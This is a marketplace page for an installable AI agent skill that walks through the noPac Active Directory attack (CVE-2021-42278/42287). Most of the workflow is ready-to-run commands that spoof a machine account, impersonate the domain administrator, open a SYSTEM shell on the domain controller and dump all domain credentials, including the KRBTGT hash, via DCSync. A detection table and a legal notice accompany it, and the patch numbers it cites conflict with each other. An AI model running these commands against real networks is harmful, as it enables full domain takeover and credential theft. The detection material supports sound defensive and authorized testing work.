seikaikyo/exploiting-nopac-cve-2021-42278-42287
external/anthropic-cybersecurity-skills/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md
Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.
$ install --global
skillsauthnpx skillsauth add seikaikyo/dash-skills exploiting-nopac-cve-2021-42278-42287Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 14, 2026, 4:45 AM188.8s7 files scanned
SKILL.md
- name:
- exploiting-nopac-cve-2021-42278-42287
- description:
- Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion)
- domain:
- cybersecurity
- subdomain:
- red-teaming
- version:
- 1.0
- author:
- mahipal
- license:
- Apache-2.0
Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Overview
noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.
When to Use
- When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
- When analyzing malware samples or attack artifacts in a controlled environment
- When conducting red team exercises or penetration testing engagements
- When building detection capabilities based on offensive technique understanding
Prerequisites
- Familiarity with red teaming concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
Objectives
- Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
- Create or leverage a machine account with modified sAMAccountName
- Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
- Use the DC ticket to perform DCSync and dump domain credentials
- Achieve Domain Admin access from a standard domain user account
- Document the complete exploitation chain with evidence
MITRE ATT&CK Mapping
- T1068 - Exploitation for Privilege Escalation
- T1136.002 - Create Account: Domain Account
- T1078.002 - Valid Accounts: Domain Accounts
- T1558 - Steal or Forge Kerberos Tickets
- T1003.006 - OS Credential Dumping: DCSync
Workflow
Phase 1: Vulnerability Scanning
- Check if the domain is vulnerable using the noPac scanner:
# Using cube0x0's noPac scanner python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1 # Using CrackMapExec module crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac - Verify the MachineAccountQuota (default is 10, allows any user to join computers):
# Check MachineAccountQuota via LDAP python3 -c " import ldap3 server = ldap3.Server('10.10.10.1') conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True) conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota']) print(conn.entries[0]['ms-DS-MachineAccountQuota']) "
Phase 2: Exploitation with noPac Tool
- Run the full noPac exploit chain:
# Using cube0x0's noPac (gets a shell on the DC) python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ -dc-host DC01 -shell --impersonate administrator -use-ldap # Using Ridter's noPac (alternative implementation) python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ --impersonate administrator -dump - The exploit automatically:
- Creates a new machine account (or uses an existing one)
- Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
- Requests a TGT for the spoofed account name
- Restores the original sAMAccountName
- Uses S4U2self to obtain a service ticket impersonating the target user
- The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)
Phase 3: Post-Exploitation
- With the obtained Domain Controller ticket, perform DCSync:
# DCSync using secretsdump.py with the Kerberos ticket export KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass domain.local/[email protected] # Or directly through the noPac shell # The shell runs as SYSTEM on the DC - Alternatively, obtain a semi-interactive shell:
python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \ -dc-host DC01 -shell --impersonate administrator -use-ldap
Phase 4: Manual Exploitation Steps
- Create a machine account:
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \ -dc-ip 10.10.10.1 domain.local/user:'Password123' - Clear the SPN and rename sAMAccountName:
# Rename machine account sAMAccountName to DC name (without $) renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \ -dc-ip 10.10.10.1 domain.local/user:'Password123' - Request a TGT for the spoofed name:
getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123' - Restore the original machine name:
renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \ -dc-ip 10.10.10.1 domain.local/user:'Password123' - Use S4U2self for impersonation:
export KRB5CCNAME=DC01.ccache getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \ -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'
Tools and Resources
| Tool | Purpose | Platform | |------|---------|----------| | noPac (cube0x0) | Automated scanner and exploiter | Python | | noPac (Ridter) | Alternative exploit implementation | Python | | Impacket | Kerberos ticket manipulation, DCSync | Python | | CrackMapExec | Vulnerability scanning module | Python | | Rubeus | Windows Kerberos ticket operations | Windows (.NET) | | secretsdump.py | Post-exploitation credential dumping | Python |
CVE Details
| CVE | Description | CVSS | Patch | |-----|-------------|------|-------| | CVE-2021-42278 | sAMAccountName spoofing (machine accounts) | 7.5 | KB5008102 | | CVE-2021-42287 | KDC PAC confusion / privilege escalation | 7.5 | KB5008380 |
Detection Signatures
| Indicator | Detection Method | |-----------|-----------------| | Machine account sAMAccountName change | Event 4742 (computer account changed) with sAMAccountName modification | | New machine account creation | Event 4741 (computer object created) | | TGT request for account without trailing $ | Kerberos audit log analysis | | S4U2self requests from non-DC machine accounts | Event 4769 with unusual service ticket requests | | Rapid sequence: create account, rename, request TGT | SIEM correlation rule for noPac attack pattern |
Validation Criteria
- [ ] Domain scanned for noPac vulnerability
- [ ] MachineAccountQuota verified (default 10)
- [ ] Exploit executed successfully (shell or DCSync)
- [ ] Domain Admin privileges obtained from standard user
- [ ] DCSync performed to dump domain credentials
- [ ] KRBTGT hash obtained for persistence validation
- [ ] Attack chain documented with timestamps
- [ ] Patch status verified (KB5008380, KB5008602)
Related Skills
seikaikyo/implementing-zero-knowledge-proof-for-authentication
tools
VerifiedTrustedCommunity
Zero-Knowledge Proofs (ZKPs) allow a prover to demonstrate knowledge of a secret (such as a password or private key) without revealing the secret itself. This skill implements the Schnorr identificati
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-web-application-logging-with-modsecurity
development
VerifiedTrustedCommunity
Configure ModSecurity WAF with OWASP Core Rule Set (CRS) for web application logging, tune rules to reduce false positives, analyze audit logs for attack detection, and implement custom SecRules for application-specific threats. The analyst configures SecRuleEngine, SecAuditEngine, and CRS paranoia levels to balance security coverage with operational stability. Activates for requests involving WAF configuration, ModSecurity rule tuning, web application audit logging, or CRS deployment.
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-vulnerability-sla-breach-alerting
development
VerifiedTrustedCommunity
Build automated alerting for vulnerability remediation SLA breaches with severity-based timelines, escalation workflows, and compliance reporting dashboards.
1SKILL.mdUpdated May 31, 2026
seikaikyo/implementing-vulnerability-remediation-sla
testing
VerifiedTrustedCommunity
Vulnerability remediation SLAs define mandatory timeframes for patching or mitigating identified vulnerabilities based on severity, asset criticality, and exploit availability. Effective SLA programs
1SKILL.mdUpdated May 31, 2026